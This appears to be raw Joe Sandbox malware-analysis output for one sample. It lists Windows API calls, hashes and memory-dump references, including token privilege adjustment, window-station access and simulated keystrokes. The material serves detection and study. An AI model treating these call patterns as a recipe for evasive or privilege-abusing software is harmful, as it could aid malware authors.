• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 5716daa1e6f25d3fb27a077595f8f286435babd8813c4efbcbde628de5cdb40b
• Instruction ID: c0876d135ed6fb7050248c059cd544936c9d83ec5cd659b530149b748a687c60
• Opcode Fuzzy Hash: 5716daa1e6f25d3fb27a077595f8f286435babd8813c4efbcbde628de5cdb40b
• Instruction Fuzzy Hash: C9213372A08A0DEBDB148F26EC417EA7BB5FB54750F21842EE886D5090EB3080D0F791
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 8eeed3c29eacb2da4c04ab0fbddb058e0e878499ab03c184258d8941ed0646da
• Instruction ID: f124c49241ed7b5d64141fa80c5c762663f747c1e476fe688f31ed032409599b
• Opcode Fuzzy Hash: 8eeed3c29eacb2da4c04ab0fbddb058e0e878499ab03c184258d8941ed0646da
• Instruction Fuzzy Hash: 7D112431208259ABD718DF29C881C6AB7A8EF45324724811AF949EB390DF32EC01C794
APIs
  • Part of subcall function 00EE4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4BEF
  • Part of subcall function 00F0525B: __wfsopen.LIBCMT ref: 00F05266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E0F
  • Part of subcall function 00EE4B6A: FreeLibrary.KERNEL32(00000000), ref: 00EE4BA4
  • Part of subcall function 00EE4C70: _memmove.LIBCMT ref: 00EE4CBA
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
• Opcode ID: 1e43cf4b92a47083d566b450ef504329b1faa48e0279f27f0730b84fccfbe2c8
• Instruction ID: b842b509e038812562d0079799ff1b3769c9f5b3965f1439b977df35c47f27bc
• Opcode Fuzzy Hash: 1e43cf4b92a47083d566b450ef504329b1faa48e0279f27f0730b84fccfbe2c8
• Instruction Fuzzy Hash: 3A11E37160024DABCF15AF71CC16FAE77E8AF84B10F108829F541BB1D1EBB19A04AB51
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: e29ec1eb4796eb4774e6d0e7777ea9f8b1fd10c8a505b9bd4f3b9662beea5b55
• Instruction ID: f283604d1f7c594e4919fbb8aa03ec8dcc14e1ba4fbb2f089c64e32fed42a41f
• Opcode Fuzzy Hash: e29ec1eb4796eb4774e6d0e7777ea9f8b1fd10c8a505b9bd4f3b9662beea5b55
• Instruction Fuzzy Hash: 54213770908345DFCB14DF54C844B1ABBE0BF88314F09886CE88A67762D731F808DB52
APIs
• __lock_file.LIBCMT ref: 00F048A6
  • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: b5456c042817ee535153316130589001e4d05ecbd47c20ea048c70c8aa9de43d
• Instruction ID: 7c43577641022f6ad75a7e77e8900e522b95f85dc64829e7639c0e00ff96b1d2
• Opcode Fuzzy Hash: b5456c042817ee535153316130589001e4d05ecbd47c20ea048c70c8aa9de43d
• Instruction Fuzzy Hash: 66F0F4B1801604EBEF11AF648C0579E36E0AF00325F058814B910DA1C1CB7CC951FB51
APIs
• FreeLibrary.KERNEL32(?,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E7E
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 72cf914fe2642812a97480c4879355f62f8b13d2d53b6fd3fbfba354acfd8c9e
• Instruction ID: d832c802d38f3dd00c7b8a8bc95c656c2b5062471f82d32186799cbc4e033319
• Opcode Fuzzy Hash: 72cf914fe2642812a97480c4879355f62f8b13d2d53b6fd3fbfba354acfd8c9e
• Instruction Fuzzy Hash: 38F0A9B0100B45CFCB348F66E884822BBE1BF003293209A7EE1D7AA660C3729840EF00
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F007B0
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
• Opcode ID: 9526ddf1541751b3c3a09a494eafb4efb4fd24071cc73e80a8f834e150b0a52a
• Instruction ID: b83c5e1e2e70e2083a90c249211d55564b809e865057838350b7d5da2a4dbdc1
• Opcode Fuzzy Hash: 9526ddf1541751b3c3a09a494eafb4efb4fd24071cc73e80a8f834e150b0a52a
• Instruction Fuzzy Hash: 61E0CD3690412C57C720D6599C05FEA77DDDF887A0F0441B5FD0CD7204D9649C9086D0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2638373210-0
                                                                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction ID: 5c65952e814dccf704b6ee9910da9365ab13c38e969ceedf9027a37ef81ca803
                                                                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction Fuzzy Hash: 0BE092B0504B005BD7388A24DC00BA377E1AB05314F04081DF6AA83241EBA278429B59
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0143FC63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                            • Instruction ID: a5375e41b22a9f62c580247a60675b2bb6d634ca7ea7572f93131364500435dc
                                                                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                            • Instruction Fuzzy Hash: 9EE08C30D85208EBEB10CBA8C908AEA73A8BB4D320F404666ED16C32A0D5308A08D696
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0143FC33
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                            • Instruction ID: ea62ede2da6f603af3b8557fc94bf9ef6f0f111e14948e1ad2aea361cafa7298
                                                                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                            • Instruction Fuzzy Hash: 96D0A730D4520CEBCB11CFB89D049DE73A8F749320F104765FD15C32C0D5319A049751
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: 66d7925799571e8f4df7c6b053b005a6b6830b85abd7f8403284c4757556a8a7
• Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction Fuzzy Hash: D6B0927644020C77CE112A82EC02A4A3B199B42B64F408020FB0C181A2A6B7A664AA89
APIs
• Sleep.KERNELBASE(000001F4), ref: 01441629
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: 7174750085a6773d4b722370dbc3383a522538d328d2a56ff08dcb5c3e98a405
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: 6DE0BF7494010DEFDB00DFA4D6496ED7BB4EF04701F1005A1FD05D7690DB309E548A66
APIs
• Sleep.KERNELBASE(000001F4), ref: 01441629
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 4dec1acccf99125d954d189f97ca121d6640d0e4217600e24f943c5529913843
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 42E0E67494010DDFDB00DFB4D6496ED7BB4EF04701F100161FD05D2280D6309D508A66
APIs
  • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F6CB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F6CB95
• GetWindowLongW.USER32(?,000000F0), ref: 00F6CBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F6CC00
• SendMessageW.USER32 ref: 00F6CC29
• _wcsncpy.LIBCMT ref: 00F6CC95
• GetKeyState.USER32(00000011), ref: 00F6CCB6
• GetKeyState.USER32(00000009), ref: 00F6CCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F6CCD9
• GetKeyState.USER32(00000010), ref: 00F6CCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F6CD0C
• SendMessageW.USER32 ref: 00F6CD33
• SendMessageW.USER32(?,00001030,?,00F6B348), ref: 00F6CE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F6CE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F6CE60
• SetCapture.USER32(?), ref: 00F6CE69
• ClientToScreen.USER32(?,?), ref: 00F6CECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F6CEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F6CEF5
• ReleaseCapture.USER32 ref: 00F6CF00
• GetCursorPos.USER32(?), ref: 00F6CF3A
• ScreenToClient.USER32(?,?), ref: 00F6CF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00F6CFA3
• SendMessageW.USER32 ref: 00F6CFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00F6D00E
• SendMessageW.USER32 ref: 00F6D03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F6D05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F6D06D
• GetCursorPos.USER32(?), ref: 00F6D08D
• ScreenToClient.USER32(?,?), ref: 00F6D09A
• GetParent.USER32(?), ref: 00F6D0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00F6D123
• SendMessageW.USER32 ref: 00F6D154
• ClientToScreen.USER32(?,?), ref: 00F6D1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F6D1E2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00F6D20C
• SendMessageW.USER32 ref: 00F6D22F
• ClientToScreen.USER32(?,?), ref: 00F6D281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F6D2B5
  • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
• GetWindowLongW.USER32(?,000000F0), ref: 00F6D351
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
• Opcode ID: d9090fe5844cc71b8c10cc58064b820ebe332b0a45cd371d94fdd4adf11a51a9
• Instruction ID: 028996c8d6799a45a4b4dc9733f5941348931a49af418bf9d881da4a609b28d9
• Opcode Fuzzy Hash: d9090fe5844cc71b8c10cc58064b820ebe332b0a45cd371d94fdd4adf11a51a9
• Instruction Fuzzy Hash: B142DB74A04284AFDB20CF28D844BBABBE5FF89720F140519F6E5972B1C771D844EB92
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F684D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
• Opcode ID: fd07a625c4a5aac70449047578cd69813928bb19213178633e4e97159f69f595
• Instruction ID: caa5186a78f7e2c08fca19676d7f2a251b399c1a9ef586b94780426ea8d42a1b
• Opcode Fuzzy Hash: fd07a625c4a5aac70449047578cd69813928bb19213178633e4e97159f69f595
• Instruction Fuzzy Hash: 7512C371904209ABEB249F24DC49FAF7BB4EF45350F10422DF516EA2E1DF748946EB60
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                                                                                            • API String ID: 1357608183-3681475764
                                                                                                                            • Opcode ID: 4af3cc861ec4f7e5e8966fb571644d8ada59ba4650d88e5081db7aa0a9186ba0
                                                                                                                            • Instruction ID: d1f5a9a515d827083d85b6f15fa6f64ed44bed0c29bed01eb21cf262cb0990ae
                                                                                                                            • Opcode Fuzzy Hash: 4af3cc861ec4f7e5e8966fb571644d8ada59ba4650d88e5081db7aa0a9186ba0
                                                                                                                            • Instruction Fuzzy Hash: 7C939175E04219DBDB24CF98C881BBDB7B1FF48720F25816AE945EB281E7709E81DB50
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00EE48DF
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F1D665
                                                                                                                            • IsIconic.USER32(?), ref: 00F1D66E
                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 00F1D67B
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D685
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F1D69B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F1D6A2
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1D6AE
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1D6BF
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1D6C7
                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F1D6CF
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D6D2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D6E7
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D6F2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D6FC
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D701
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D70A
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D70F
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D719
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D71E
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D721
                                                                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00F1D748
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                                            • Opcode ID: 283496f95ce87a3500d2732ff5d8915c5c81698982613b23db4a06f4d8607782
                                                                                                                            • Instruction ID: df423dda2bf71b8a31ec9cbe55d3793c388713690be45883432d56ab5133aa8f
                                                                                                                            • Opcode Fuzzy Hash: 283496f95ce87a3500d2732ff5d8915c5c81698982613b23db4a06f4d8607782
                                                                                                                            • Instruction Fuzzy Hash: FA315271A4031CBBEB216B619C49FBF7E6CEB44B60F144025FA05EA1D1CAB15D41BEA1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
                                                                                                                              • Part of subcall function 00F387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
                                                                                                                              • Part of subcall function 00F387E1: GetLastError.KERNEL32 ref: 00F38865
                                                                                                                            • _memset.LIBCMT ref: 00F38353
                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F383A5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F383B6
                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F383CD
                                                                                                                            • GetProcessWindowStation.USER32 ref: 00F383E6
                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00F383F0
                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F3840A
                                                                                                                              • Part of subcall function 00F381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F38309), ref: 00F381E0
                                                                                                                              • Part of subcall function 00F381CB: CloseHandle.KERNEL32(?,?,00F38309), ref: 00F381F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                            • String ID: $default$winsta0
                                                                                                                            • API String ID: 2063423040-1027155976
                                                                                                                            • Opcode ID: 1ea6b020c42b01bdb553cd2a381e2ca977bf1ce4a0e73a3bf3f85c7546eae0f6
                                                                                                                            • Instruction ID: e2fe34301a2e07db7cd0e3d7ca182bcb96e2f36764f08bc78991d6951c4a8d01
                                                                                                                            • Opcode Fuzzy Hash: 1ea6b020c42b01bdb553cd2a381e2ca977bf1ce4a0e73a3bf3f85c7546eae0f6
                                                                                                                            • Instruction Fuzzy Hash: BE815A71D00309AFDF519FA4DC45AEE7B79AF043A4F184169F820A7261DB798E16EB20
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F4C78D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4C7E1
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4C806
